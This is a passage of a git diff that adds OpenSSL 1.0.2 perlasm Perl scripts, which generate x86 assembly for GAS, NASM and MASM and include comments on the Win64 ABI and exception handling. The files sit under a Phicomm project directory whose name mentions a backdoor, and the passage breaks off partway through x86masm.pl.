+	if ((ref($asm) eq 'CODE') && scalar(@bytes=&$asm($line))) {
+	    print $gas?".byte\t":"DB\t",join(',',@bytes),"\n";
+	    next;
+	}
+
+	ARGUMENT: while (1) {
+	my $arg;
+
+	if ($arg=register->re(\$line))	{ opcode->size($arg->size()); }
+	elsif ($arg=const->re(\$line))	{ }
+	elsif ($arg=ea->re(\$line))	{ }
+	elsif ($arg=expr->re(\$line))	{ }
+	else				{ last ARGUMENT; }
+
+	push @args,$arg;
+
+	last ARGUMENT if ($line !~ /^,/);
+
+	$line =~ s/^,\s*//;
+	} # ARGUMENT:
+
+	if ($#args>=0) {
+	    my $insn;
+	    my $sz=opcode->size();
+
+	    if ($gas) {
+		$insn = $opcode->out($#args>=1?$args[$#args]->size():$sz);
+		@args = map($_->out($sz),@args);
+		printf "\t%s\t%s",$insn,join(",",@args);
+	    } else {
+		$insn = $opcode->out();
+		foreach (@args) {
+		    my $arg = $_->out();
+		    # $insn.=$sz compensates for movq, pinsrw, ...
+		    if ($arg =~ /^xmm[0-9]+$/) { $insn.=$sz; $sz="x" if(!$sz); last; }
+		    if ($arg =~ /^ymm[0-9]+$/) { $insn.=$sz; $sz="y" if(!$sz); last; }
+		    if ($arg =~ /^zmm[0-9]+$/) { $insn.=$sz; $sz="z" if(!$sz); last; }
+		    if ($arg =~ /^mm[0-9]+$/)  { $insn.=$sz; $sz="q" if(!$sz); last; }
+		}
+		@args = reverse(@args);
+		undef $sz if ($nasm && $opcode->mnemonic() eq "lea");
+		printf "\t%s\t%s",$insn,join(",",map($_->out($sz),@args));
+	    }
+	} else {
+	    printf "\t%s",$opcode->out();
+	}
+    }
+
+    print $line,"\n";
+}
+
+print "\n$current_segment\tENDS\n"	if ($current_segment && $masm);
+print "END\n"				if ($masm);
+
+close STDOUT;
+
+#################################################
+# Cross-reference x86_64 ABI "card"
+#
+# 		Unix		Win64
+# %rax		*		*
+# %rbx		-		-
+# %rcx		#4		#1
+# %rdx		#3		#2
+# %rsi		#2		-
+# %rdi		#1		-
+# %rbp		-		-
+# %rsp		-		-
+# %r8		#5		#3
+# %r9		#6		#4
+# %r10		*		*
+# %r11		*		*
+# %r12		-		-
+# %r13		-		-
+# %r14		-		-
+# %r15		-		-
+# 
+# (*)	volatile register
+# (-)	preserved by callee
+# (#)	Nth argument, volatile
+#
+# In Unix terms top of stack is argument transfer area for arguments
+# which could not be accomodated in registers. Or in other words 7th
+# [integer] argument resides at 8(%rsp) upon function entry point.
+# 128 bytes above %rsp constitute a "red zone" which is not touched
+# by signal handlers and can be used as temporal storage without
+# allocating a frame.
+#
+# In Win64 terms N*8 bytes on top of stack is argument transfer area,
+# which belongs to/can be overwritten by callee. N is the number of
+# arguments passed to callee, *but* not less than 4! This means that
+# upon function entry point 5th argument resides at 40(%rsp), as well
+# as that 32 bytes from 8(%rsp) can always be used as temporal
+# storage [without allocating a frame]. One can actually argue that
+# one can assume a "red zone" above stack pointer under Win64 as well.
+# Point is that at apparently no occasion Windows kernel would alter
+# the area above user stack pointer in true asynchronous manner...
+#
+# All the above means that if assembler programmer adheres to Unix
+# register and stack layout, but disregards the "red zone" existense,
+# it's possible to use following prologue and epilogue to "gear" from
+# Unix to Win64 ABI in leaf functions with not more than 6 arguments.
+#
+# omnipotent_function:
+# ifdef WIN64
+#	movq	%rdi,8(%rsp)
+#	movq	%rsi,16(%rsp)
+#	movq	%rcx,%rdi	; if 1st argument is actually present
+#	movq	%rdx,%rsi	; if 2nd argument is actually ...
+#	movq	%r8,%rdx	; if 3rd argument is ...
+#	movq	%r9,%rcx	; if 4th argument ...
+#	movq	40(%rsp),%r8	; if 5th ...
+#	movq	48(%rsp),%r9	; if 6th ...
+# endif
+#	...
+# ifdef WIN64
+#	movq	8(%rsp),%rdi
+#	movq	16(%rsp),%rsi
+# endif
+#	ret
+#
+#################################################
+# Win64 SEH, Structured Exception Handling.
+#
+# Unlike on Unix systems(*) lack of Win64 stack unwinding information
+# has undesired side-effect at run-time: if an exception is raised in
+# assembler subroutine such as those in question (basically we're
+# referring to segmentation violations caused by malformed input
+# parameters), the application is briskly terminated without invoking
+# any exception handlers, most notably without generating memory dump
+# or any user notification whatsoever. This poses a problem. It's
+# possible to address it by registering custom language-specific
+# handler that would restore processor context to the state at
+# subroutine entry point and return "exception is not handled, keep
+# unwinding" code. Writing such handler can be a challenge... But it's
+# doable, though requires certain coding convention. Consider following
+# snippet:
+#
+# .type	function,@function
+# function:
+#	movq	%rsp,%rax	# copy rsp to volatile register
+#	pushq	%r15		# save non-volatile registers
+#	pushq	%rbx
+#	pushq	%rbp
+#	movq	%rsp,%r11
+#	subq	%rdi,%r11	# prepare [variable] stack frame
+#	andq	$-64,%r11
+#	movq	%rax,0(%r11)	# check for exceptions
+#	movq	%r11,%rsp	# allocate [variable] stack frame
+#	movq	%rax,0(%rsp)	# save original rsp value
+# magic_point:
+#	...
+#	movq	0(%rsp),%rcx	# pull original rsp value
+#	movq	-24(%rcx),%rbp	# restore non-volatile registers
+#	movq	-16(%rcx),%rbx
+#	movq	-8(%rcx),%r15
+#	movq	%rcx,%rsp	# restore original rsp
+#	ret
+# .size function,.-function
+#
+# The key is that up to magic_point copy of original rsp value remains
+# in chosen volatile register and no non-volatile register, except for
+# rsp, is modified. While past magic_point rsp remains constant till
+# the very end of the function. In this case custom language-specific
+# exception handler would look like this:
+#
+# EXCEPTION_DISPOSITION handler (EXCEPTION_RECORD *rec,ULONG64 frame,
+#		CONTEXT *context,DISPATCHER_CONTEXT *disp)
+# {	ULONG64 *rsp = (ULONG64 *)context->Rax;
+#	if (context->Rip >= magic_point)
+#	{   rsp = ((ULONG64 **)context->Rsp)[0];
+#	    context->Rbp = rsp[-3];
+#	    context->Rbx = rsp[-2];
+#	    context->R15 = rsp[-1];
+#	}
+#	context->Rsp = (ULONG64)rsp;
+#	context->Rdi = rsp[1];
+#	context->Rsi = rsp[2];
+#
+#	memcpy (disp->ContextRecord,context,sizeof(CONTEXT));
+#	RtlVirtualUnwind(UNW_FLAG_NHANDLER,disp->ImageBase,
+#		dips->ControlPc,disp->FunctionEntry,disp->ContextRecord,
+#		&disp->HandlerData,&disp->EstablisherFrame,NULL);
+#	return ExceptionContinueSearch;
+# }
+#
+# It's appropriate to implement this handler in assembler, directly in
+# function's module. In order to do that one has to know members'
+# offsets in CONTEXT and DISPATCHER_CONTEXT structures and some constant
+# values. Here they are:
+#
+#	CONTEXT.Rax				120
+#	CONTEXT.Rcx				128
+#	CONTEXT.Rdx				136
+#	CONTEXT.Rbx				144
+#	CONTEXT.Rsp				152
+#	CONTEXT.Rbp				160
+#	CONTEXT.Rsi				168
+#	CONTEXT.Rdi				176
+#	CONTEXT.R8				184
+#	CONTEXT.R9				192
+#	CONTEXT.R10				200
+#	CONTEXT.R11				208
+#	CONTEXT.R12				216
+#	CONTEXT.R13				224
+#	CONTEXT.R14				232
+#	CONTEXT.R15				240
+#	CONTEXT.Rip				248
+#	CONTEXT.Xmm6				512
+#	sizeof(CONTEXT)				1232
+#	DISPATCHER_CONTEXT.ControlPc		0
+#	DISPATCHER_CONTEXT.ImageBase		8
+#	DISPATCHER_CONTEXT.FunctionEntry	16
+#	DISPATCHER_CONTEXT.EstablisherFrame	24
+#	DISPATCHER_CONTEXT.TargetIp		32
+#	DISPATCHER_CONTEXT.ContextRecord	40
+#	DISPATCHER_CONTEXT.LanguageHandler	48
+#	DISPATCHER_CONTEXT.HandlerData		56
+#	UNW_FLAG_NHANDLER			0
+#	ExceptionContinueSearch			1
+#
+# In order to tie the handler to the function one has to compose
+# couple of structures: one for .xdata segment and one for .pdata.
+#
+# UNWIND_INFO structure for .xdata segment would be
+#
+# function_unwind_info:
+#	.byte	9,0,0,0
+#	.rva	handler
+#
+# This structure designates exception handler for a function with
+# zero-length prologue, no stack frame or frame register.
+#
+# To facilitate composing of .pdata structures, auto-generated "gear"
+# prologue copies rsp value to rax and denotes next instruction with
+# .LSEH_begin_{function_name} label. This essentially defines the SEH
+# styling rule mentioned in the beginning. Position of this label is
+# chosen in such manner that possible exceptions raised in the "gear"
+# prologue would be accounted to caller and unwound from latter's frame.
+# End of function is marked with respective .LSEH_end_{function_name}
+# label. To summarize, .pdata segment would contain
+#
+#	.rva	.LSEH_begin_function
+#	.rva	.LSEH_end_function
+#	.rva	function_unwind_info
+#
+# Reference to functon_unwind_info from .xdata segment is the anchor.
+# In case you wonder why references are 32-bit .rvas and not 64-bit
+# .quads. References put into these two segments are required to be
+# *relative* to the base address of the current binary module, a.k.a.
+# image base. No Win64 module, be it .exe or .dll, can be larger than
+# 2GB and thus such relative references can be and are accommodated in
+# 32 bits.
+#
+# Having reviewed the example function code, one can argue that "movq
+# %rsp,%rax" above is redundant. It is not! Keep in mind that on Unix
+# rax would contain an undefined value. If this "offends" you, use
+# another register and refrain from modifying rax till magic_point is
+# reached, i.e. as if it was a non-volatile register. If more registers
+# are required prior [variable] frame setup is completed, note that
+# nobody says that you can have only one "magic point." You can
+# "liberate" non-volatile registers by denoting last stack off-load
+# instruction and reflecting it in finer grade unwind logic in handler.
+# After all, isn't it why it's called *language-specific* handler...
+#
+# Attentive reader can notice that exceptions would be mishandled in
+# auto-generated "gear" epilogue. Well, exception effectively can't
+# occur there, because if memory area used by it was subject to
+# segmentation violation, then it would be raised upon call to the
+# function (and as already mentioned be accounted to caller, which is
+# not a problem). If you're still not comfortable, then define tail
+# "magic point" just prior ret instruction and have handler treat it...
+#
+# (*)	Note that we're talking about run-time, not debug-time. Lack of
+#	unwind information makes debugging hard on both Windows and
+#	Unix. "Unlike" referes to the fact that on Unix signal handler
+#	will always be invoked, core dumped and appropriate exit code
+#	returned to parent (for user notification).
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86asm.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86asm.pl
new file mode 100644
index 0000000..cae156a
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86asm.pl
@@ -0,0 +1,298 @@
+#!/usr/bin/env perl
+
+# require 'x86asm.pl';
+# &asm_init(<flavor>,"des-586.pl"[,$i386only]);
+# &function_begin("foo");
+# ...
+# &function_end("foo");
+# &asm_finish
+
+$out=();
+$i386=0;
+
+# AUTOLOAD is this context has quite unpleasant side effect, namely
+# that typos in function calls effectively go to assembler output,
+# but on the pros side we don't have to implement one subroutine per
+# each opcode...
+sub ::AUTOLOAD
+{ my $opcode = $AUTOLOAD;
+
+    die "more than 4 arguments passed to $opcode" if ($#_>3);
+
+    $opcode =~ s/.*:://;
+    if    ($opcode =~ /^push/) { $stack+=4; }
+    elsif ($opcode =~ /^pop/)  { $stack-=4; }
+
+    &generic($opcode,@_) or die "undefined subroutine \&$AUTOLOAD";
+}
+
+sub ::emit
+{ my $opcode=shift;
+
+    if ($#_==-1)    { push(@out,"\t$opcode\n");				}
+    else            { push(@out,"\t$opcode\t".join(',',@_)."\n");	}
+}
+
+sub ::LB
+{   $_[0] =~ m/^e?([a-d])x$/o or die "$_[0] does not have a 'low byte'";
+  $1."l";
+}
+sub ::HB
+{   $_[0] =~ m/^e?([a-d])x$/o or die "$_[0] does not have a 'high byte'";
+  $1."h";
+}
+sub ::stack_push{ my $num=$_[0]*4; $stack+=$num; &sub("esp",$num);	}
+sub ::stack_pop	{ my $num=$_[0]*4; $stack-=$num; &add("esp",$num);	}
+sub ::blindpop	{ &pop($_[0]); $stack+=4;				}
+sub ::wparam	{ &DWP($stack+4*$_[0],"esp");				}
+sub ::swtmp	{ &DWP(4*$_[0],"esp");					}
+
+sub ::bswap
+{   if ($i386)	# emulate bswap for i386
+    {	&comment("bswap @_");
+	&xchg(&HB(@_),&LB(@_));
+	&ror (@_,16);
+	&xchg(&HB(@_),&LB(@_));
+    }
+    else
+    {	&generic("bswap",@_);	}
+}
+# These are made-up opcodes introduced over the years essentially
+# by ignorance, just alias them to real ones...
+sub ::movb	{ &mov(@_);	}
+sub ::xorb	{ &xor(@_);	}
+sub ::rotl	{ &rol(@_);	}
+sub ::rotr	{ &ror(@_);	}
+sub ::exch	{ &xchg(@_);	}
+sub ::halt	{ &hlt;		}
+sub ::movz	{ &movzx(@_);	}
+sub ::pushf	{ &pushfd;	}
+sub ::popf	{ &popfd;	}
+
+# 3 argument instructions
+sub ::movq
+{ my($p1,$p2,$optimize)=@_;
+
+    if ($optimize && $p1=~/^mm[0-7]$/ && $p2=~/^mm[0-7]$/)
+    # movq between mmx registers can sink Intel CPUs
+    {	&::pshufw($p1,$p2,0xe4);		}
+    else
+    {	&::generic("movq",@_);			}
+}
+
+# SSE>2 instructions
+my %regrm = (	"eax"=>0, "ecx"=>1, "edx"=>2, "ebx"=>3,
+		"esp"=>4, "ebp"=>5, "esi"=>6, "edi"=>7	);
+sub ::pextrd
+{ my($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /(e[a-dsd][ixp]):xmm([0-7])/)
+    {	&::data_byte(0x66,0x0f,0x3a,0x16,0xc0|($2<<3)|$regrm{$1},$imm);	}
+    else
+    {	&::generic("pextrd",@_);		}
+}
+
+sub ::pinsrd
+{ my($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):(e[a-dsd][ixp])/)
+    {	&::data_byte(0x66,0x0f,0x3a,0x22,0xc0|($1<<3)|$regrm{$2},$imm);	}
+    else
+    {	&::generic("pinsrd",@_);		}
+}
+
+sub ::pshufb
+{ my($dst,$src)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&data_byte(0x66,0x0f,0x38,0x00,0xc0|($1<<3)|$2);	}
+    else
+    {	&::generic("pshufb",@_);		}
+}
+
+sub ::palignr
+{ my($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&::data_byte(0x66,0x0f,0x3a,0x0f,0xc0|($1<<3)|$2,$imm);	}
+    else
+    {	&::generic("palignr",@_);		}
+}
+
+sub ::pclmulqdq
+{ my($dst,$src,$imm)=@_;
+    if ("$dst:$src" =~ /xmm([0-7]):xmm([0-7])/)
+    {	&::data_byte(0x66,0x0f,0x3a,0x44,0xc0|($1<<3)|$2,$imm);	}
+    else
+    {	&::generic("pclmulqdq",@_);		}
+}
+
+sub ::rdrand
+{ my ($dst)=@_;
+    if ($dst =~ /(e[a-dsd][ixp])/)
+    {	&::data_byte(0x0f,0xc7,0xf0|$regrm{$dst});	}
+    else
+    {	&::generic("rdrand",@_);	}
+}
+
+sub ::rdseed
+{ my ($dst)=@_;
+    if ($dst =~ /(e[a-dsd][ixp])/)
+    {	&::data_byte(0x0f,0xc7,0xf8|$regrm{$dst});	}
+    else
+    {	&::generic("rdrand",@_);	}
+}
+
+sub rxb {
+ local *opcode=shift;
+ my ($dst,$src1,$src2,$rxb)=@_;
+
+   $rxb|=0x7<<5;
+   $rxb&=~(0x04<<5) if($dst>=8);
+   $rxb&=~(0x01<<5) if($src1>=8);
+   $rxb&=~(0x02<<5) if($src2>=8);
+   push @opcode,$rxb;
+}
+
+sub ::vprotd
+{ my $args=join(',',@_);
+    if ($args =~ /xmm([0-7]),xmm([0-7]),([x0-9a-f]+)/)
+    { my @opcode=(0x8f);
+	rxb(\@opcode,$1,$2,-1,0x08);
+	push @opcode,0x78,0xc2;
+	push @opcode,0xc0|($2&7)|(($1&7)<<3);		# ModR/M
+	my $c=$3;
+	push @opcode,$c=~/^0/?oct($c):$c;
+	&::data_byte(@opcode);
+    }
+    else
+    {	&::generic("vprotd",@_);	}
+}
+
+# label management
+$lbdecor="L";		# local label decoration, set by package
+$label="000";
+
+sub ::islabel		# see is argument is a known label
+{ my $i;
+    foreach $i (values %label) { return $i if ($i eq $_[0]); }
+  $label{$_[0]};	# can be undef
+}
+
+sub ::label		# instantiate a function-scope label
+{   if (!defined($label{$_[0]}))
+    {	$label{$_[0]}="${lbdecor}${label}${_[0]}"; $label++;   }
+  $label{$_[0]};
+}
+
+sub ::LABEL		# instantiate a file-scope label
+{   $label{$_[0]}=$_[1] if (!defined($label{$_[0]}));
+  $label{$_[0]};
+}
+
+sub ::static_label	{ &::LABEL($_[0],$lbdecor.$_[0]); }
+
+sub ::set_label_B	{ push(@out,"@_:\n"); }
+sub ::set_label
+{ my $label=&::label($_[0]);
+    &::align($_[1]) if ($_[1]>1);
+    &::set_label_B($label);
+  $label;
+}
+
+sub ::wipe_labels	# wipes function-scope labels
+{   foreach $i (keys %label)
+    {	delete $label{$i} if ($label{$i} =~ /^\Q${lbdecor}\E[0-9]{3}/);	}
+}
+
+# subroutine management
+sub ::function_begin
+{   &function_begin_B(@_);
+    $stack=4;
+    &push("ebp");
+    &push("ebx");
+    &push("esi");
+    &push("edi");
+}
+
+sub ::function_end
+{   &pop("edi");
+    &pop("esi");
+    &pop("ebx");
+    &pop("ebp");
+    &ret();
+    &function_end_B(@_);
+    $stack=0;
+    &wipe_labels();
+}
+
+sub ::function_end_A
+{   &pop("edi");
+    &pop("esi");
+    &pop("ebx");
+    &pop("ebp");
+    &ret();
+    $stack+=16;	# readjust esp as if we didn't pop anything
+}
+
+sub ::asciz
+{ my @str=unpack("C*",shift);
+    push @str,0;
+    while ($#str>15) {
+	&data_byte(@str[0..15]);
+	foreach (0..15) { shift @str; }
+    }
+    &data_byte(@str) if (@str);
+}
+
+sub ::asm_finish
+{   &file_end();
+    print @out;
+}
+
+sub ::asm_init
+{ my ($type,$fn,$cpu)=@_;
+
+    $filename=$fn;
+    $i386=$cpu;
+
+    $elf=$cpp=$coff=$aout=$macosx=$win32=$netware=$mwerks=$android=0;
+    if    (($type eq "elf"))
+    {	$elf=1;			require "x86gas.pl";	}
+    elsif (($type eq "elf-1"))
+    {	$elf=-1;		require "x86gas.pl";	}
+    elsif (($type eq "a\.out"))
+    {	$aout=1;		require "x86gas.pl";	}
+    elsif (($type eq "coff" or $type eq "gaswin"))
+    {	$coff=1;		require "x86gas.pl";	}
+    elsif (($type eq "win32n"))
+    {	$win32=1;		require "x86nasm.pl";	}
+    elsif (($type eq "nw-nasm"))
+    {	$netware=1;		require "x86nasm.pl";	}
+    #elsif (($type eq "nw-mwasm"))
+    #{	$netware=1; $mwerks=1;	require "x86nasm.pl";	}
+    elsif (($type eq "win32"))
+    {	$win32=1;		require "x86masm.pl";	}
+    elsif (($type eq "macosx"))
+    {	$aout=1; $macosx=1;	require "x86gas.pl";	}
+    elsif (($type eq "android"))
+    {	$elf=1; $android=1;	require "x86gas.pl";	}
+    else
+    {	print STDERR <<"EOF";
+Pick one target type from
+	elf	- Linux, FreeBSD, Solaris x86, etc.
+	a.out	- DJGPP, elder OpenBSD, etc.
+	coff	- GAS/COFF such as Win32 targets
+	win32n	- Windows 95/Windows NT NASM format
+	nw-nasm - NetWare NASM format
+	macosx	- Mac OS X
+EOF
+	exit(1);
+    }
+
+    $pic=0;
+    for (@ARGV) { $pic=1 if (/\-[fK]PIC/i); }
+
+    $filename =~ s/\.pl$//;
+    &file($filename);
+}
+
+sub ::hidden {}
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86gas.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86gas.pl
new file mode 100644
index 0000000..63b2301
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86gas.pl
@@ -0,0 +1,258 @@
+#!/usr/bin/env perl
+
+package x86gas;
+
+*out=\@::out;
+
+$::lbdecor=$::aout?"L":".L";		# local label decoration
+$nmdecor=($::aout or $::coff)?"_":"";	# external name decoration
+
+$initseg="";
+
+$align=16;
+$align=log($align)/log(2) if ($::aout);
+$com_start="#" if ($::aout or $::coff);
+
+sub opsize()
+{ my $reg=shift;
+    if    ($reg =~ m/^%e/o)		{ "l"; }
+    elsif ($reg =~ m/^%[a-d][hl]$/o)	{ "b"; }
+    elsif ($reg =~ m/^%[xm]/o)		{ undef; }
+    else				{ "w"; }
+}
+
+# swap arguments;
+# expand opcode with size suffix;
+# prefix numeric constants with $;
+sub ::generic
+{ my($opcode,@arg)=@_;
+  my($suffix,$dst,$src);
+
+    @arg=reverse(@arg);
+
+    for (@arg)
+    {	s/^(\*?)(e?[a-dsixphl]{2})$/$1%$2/o;	# gp registers
+	s/^([xy]?mm[0-7])$/%$1/o;		# xmm/mmx registers
+	s/^(\-?[0-9]+)$/\$$1/o;			# constants
+	s/^(\-?0x[0-9a-f]+)$/\$$1/o;		# constants
+    }
+
+    $dst = $arg[$#arg]		if ($#arg>=0);
+    $src = $arg[$#arg-1]	if ($#arg>=1);
+    if    ($dst =~ m/^%/o)	{ $suffix=&opsize($dst); }
+    elsif ($src =~ m/^%/o)	{ $suffix=&opsize($src); }
+    else			{ $suffix="l";           }
+    undef $suffix if ($dst =~ m/^%[xm]/o || $src =~ m/^%[xm]/o);
+
+    if ($#_==0)				{ &::emit($opcode);		}
+    elsif ($#_==1 && $opcode =~ m/^(call|clflush|j|loop|set)/o)
+					{ &::emit($opcode,@arg);	}
+    else				{ &::emit($opcode.$suffix,@arg);}
+
+  1;
+}
+#
+# opcodes not covered by ::generic above, mostly inconsistent namings...
+#
+sub ::movzx	{ &::movzb(@_);			}
+sub ::pushfd	{ &::pushfl;			}
+sub ::popfd	{ &::popfl;			}
+sub ::cpuid	{ &::emit(".byte\t0x0f,0xa2");	}
+sub ::rdtsc	{ &::emit(".byte\t0x0f,0x31");	}
+
+sub ::call	{ &::emit("call",(&::islabel($_[0]) or "$nmdecor$_[0]")); }
+sub ::call_ptr	{ &::generic("call","*$_[0]");	}
+sub ::jmp_ptr	{ &::generic("jmp","*$_[0]");	}
+
+*::bswap = sub	{ &::emit("bswap","%$_[0]");	} if (!$::i386);
+
+sub ::DWP
+{ my($addr,$reg1,$reg2,$idx)=@_;
+  my $ret="";
+
+    if (!defined($idx) && 1*$reg2) { $idx=$reg2; $reg2=$reg1; undef $reg1; }
+
+    $addr =~ s/^\s+//;
+    # prepend global references with optional underscore
+    $addr =~ s/^([^\+\-0-9][^\+\-]*)/&::islabel($1) or "$nmdecor$1"/ige;
+
+    $reg1 = "%$reg1" if ($reg1);
+    $reg2 = "%$reg2" if ($reg2);
+
+    $ret .= $addr if (($addr ne "") && ($addr ne 0));
+
+    if ($reg2)
+    {	$idx!= 0 or $idx=1;
+	$ret .= "($reg1,$reg2,$idx)";
+    }
+    elsif ($reg1)
+    {	$ret .= "($reg1)";	}
+
+  $ret;
+}
+sub ::QWP	{ &::DWP(@_);	}
+sub ::BP	{ &::DWP(@_);	}
+sub ::WP	{ &::DWP(@_);	}
+sub ::BC	{ @_;		}
+sub ::DWC	{ @_;		}
+
+sub ::file
+{   push(@out,".file\t\"$_[0].s\"\n.text\n");	}
+
+sub ::function_begin_B
+{ my $func=shift;
+  my $global=($func !~ /^_/);
+  my $begin="${::lbdecor}_${func}_begin";
+
+    &::LABEL($func,$global?"$begin":"$nmdecor$func");
+    $func=$nmdecor.$func;
+
+    push(@out,".globl\t$func\n")	if ($global);
+    if ($::coff)
+    {	push(@out,".def\t$func;\t.scl\t".(3-$global).";\t.type\t32;\t.endef\n"); }
+    elsif (($::aout and !$::pic) or $::macosx)
+    { }
+    else
+    {	push(@out,".type	$func,\@function\n"); }
+    push(@out,".align\t$align\n");
+    push(@out,"$func:\n");
+    push(@out,"$begin:\n")		if ($global);
+    $::stack=4;
+}
+
+sub ::function_end_B
+{ my $func=shift;
+    push(@out,".size\t$nmdecor$func,.-".&::LABEL($func)."\n") if ($::elf);
+    $::stack=0;
+    &::wipe_labels();
+}
+
+sub ::comment
+	{
+	if (!defined($com_start) or $::elf)
+		{	# Regarding $::elf above...
+			# GNU and SVR4 as'es use different comment delimiters,
+		push(@out,"\n");	# so we just skip ELF comments...
+		return;
+		}
+	foreach (@_)
+		{
+		if (/^\s*$/)
+			{ push(@out,"\n"); }
+		else
+			{ push(@out,"\t$com_start $_ $com_end\n"); }
+		}
+	}
+
+sub ::external_label
+{   foreach(@_) { &::LABEL($_,$nmdecor.$_); }   }
+
+sub ::public_label
+{   push(@out,".globl\t".&::LABEL($_[0],$nmdecor.$_[0])."\n");   }
+
+sub ::file_end
+{   if ($::macosx)
+    {	if (%non_lazy_ptr)
+    	{   push(@out,".section __IMPORT,__pointers,non_lazy_symbol_pointers\n");
+	    foreach $i (keys %non_lazy_ptr)
+	    {	push(@out,"$non_lazy_ptr{$i}:\n.indirect_symbol\t$i\n.long\t0\n");   }
+	}
+    }
+    if (grep {/\b${nmdecor}OPENSSL_ia32cap_P\b/i} @out) {
+	my $tmp=".comm\t${nmdecor}OPENSSL_ia32cap_P,16";
+	if ($::macosx)	{ push (@out,"$tmp,2\n"); }
+	elsif ($::elf)	{ push (@out,"$tmp,4\n"); }
+	else		{ push (@out,"$tmp\n"); }
+    }
+    push(@out,$initseg) if ($initseg);
+}
+
+sub ::data_byte	{   push(@out,".byte\t".join(',',@_)."\n");   }
+sub ::data_short{   push(@out,".value\t".join(',',@_)."\n");  }
+sub ::data_word {   push(@out,".long\t".join(',',@_)."\n");   }
+
+sub ::align
+{ my $val=$_[0];
+    if ($::aout)
+    {	$val=int(log($val)/log(2));
+	$val.=",0x90";
+    }
+    push(@out,".align\t$val\n");
+}
+
+sub ::picmeup
+{ my($dst,$sym,$base,$reflabel)=@_;
+
+    if (($::pic && ($::elf || $::aout)) || $::macosx)
+    {	if (!defined($base))
+	{   &::call(&::label("PIC_me_up"));
+	    &::set_label("PIC_me_up");
+	    &::blindpop($dst);
+	    $base=$dst;
+	    $reflabel=&::label("PIC_me_up");
+	}
+	if ($::macosx)
+	{   my $indirect=&::static_label("$nmdecor$sym\$non_lazy_ptr");
+	    &::mov($dst,&::DWP("$indirect-$reflabel",$base));
+	    $non_lazy_ptr{"$nmdecor$sym"}=$indirect;
+	}
+	elsif ($sym eq "OPENSSL_ia32cap_P" && $::elf>0)
+	{   &::lea($dst,&::DWP("$sym-$reflabel",$base));   }
+	else
+	{   &::lea($dst,&::DWP("_GLOBAL_OFFSET_TABLE_+[.-$reflabel]",
+			    $base));
+	    &::mov($dst,&::DWP("$sym\@GOT",$dst));
+	}
+    }
+    else
+    {	&::lea($dst,&::DWP($sym));	}
+}
+
+sub ::initseg
+{ my $f=$nmdecor.shift;
+
+    if ($::android)
+    {	$initseg.=<<___;
+.section	.init_array
+.align	4
+.long	$f
+___
+    }
+    elsif ($::elf)
+    {	$initseg.=<<___;
+.section	.init
+	call	$f
+___
+    }
+    elsif ($::coff)
+    {   $initseg.=<<___;	# applies to both Cygwin and Mingw
+.section	.ctors
+.long	$f
+___
+    }
+    elsif ($::macosx)
+    {	$initseg.=<<___;
+.mod_init_func
+.align 2
+.long   $f
+___
+    }
+    elsif ($::aout)
+    {	my $ctor="${nmdecor}_GLOBAL_\$I\$$f";
+	$initseg.=".text\n";
+	$initseg.=".type	$ctor,\@function\n" if ($::pic);
+	$initseg.=<<___;	# OpenBSD way...
+.globl	$ctor
+.align	2
+$ctor:
+	jmp	$f
+___
+    }
+}
+
+sub ::dataseg
+{   push(@out,".data\n");   }
+
+*::hidden = sub { push(@out,".hidden\t$nmdecor$_[0]\n"); } if ($::elf);
+
+1;
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86masm.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86masm.pl
new file mode 100644
index 0000000..1741342
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/perlasm/x86masm.pl
@@ -0,0 +1,200 @@
+#!/usr/bin/env perl
+
+package x86masm;
+
+*out=\@::out;
+
+$::lbdecor="\$L";	# local label decoration
+$nmdecor="_";		# external name decoration
+
+$initseg="";
+$segment="";
+
+sub ::generic
+{ my ($opcode,@arg)=@_;
+
+    # fix hexadecimal constants
+    for (@arg) { s/(?<![\w\$\.])0x([0-9a-f]+)/0$1h/oi; }
+
+    if ($opcode =~ /lea/ && @arg[1] =~ s/.*PTR\s+(\(.*\))$/OFFSET $1/)	# no []
+    {	$opcode="mov";	}
+    elsif ($opcode !~ /movq/)
+    {	# fix xmm references
+	$arg[0] =~ s/\b[A-Z]+WORD\s+PTR/XMMWORD PTR/i if ($arg[1]=~/\bxmm[0-7]\b/i);
+	$arg[1] =~ s/\b[A-Z]+WORD\s+PTR/XMMWORD PTR/i if ($arg[0]=~/\bxmm[0-7]\b/i);
+    }
+
+    &::emit($opcode,@arg);
+  1;
+}
+#
+# opcodes not covered by ::generic above, mostly inconsistent namings...
+#
+sub ::call	{ &::emit("call",(&::islabel($_[0]) or "$nmdecor$_[0]")); }
+sub ::call_ptr	{ &::emit("call",@_);	}
+sub ::jmp_ptr	{ &::emit("jmp",@_);	}
+sub ::lock	{ &::data_byte(0xf0);	}
+
+sub get_mem
+{ my($size,$addr,$reg1,$reg2,$idx)=@_;
+  my($post,$ret);
+
+    if (!defined($idx) && 1*$reg2) { $idx=$reg2; $reg2=$reg1; undef $reg1; }
+
+    $ret .= "$size PTR " if ($size ne "");
+
+    $addr =~ s/^\s+//;
+    # prepend global references with optional underscore
+    $addr =~ s/^([^\+\-0-9][^\+\-]*)/&::islabel($1) or "$nmdecor$1"/ige;
+    # put address arithmetic expression in parenthesis
+    $addr="($addr)" if ($addr =~ /^.+[\-\+].+$/);
+
+    if (($addr ne "") && ($addr ne 0))
+    {	if ($addr !~ /^-/)	{ $ret .= "$addr";  }
+	else			{ $post=$addr;      }
+    }
+    $ret .= "[";
+
+    if ($reg2 ne "")
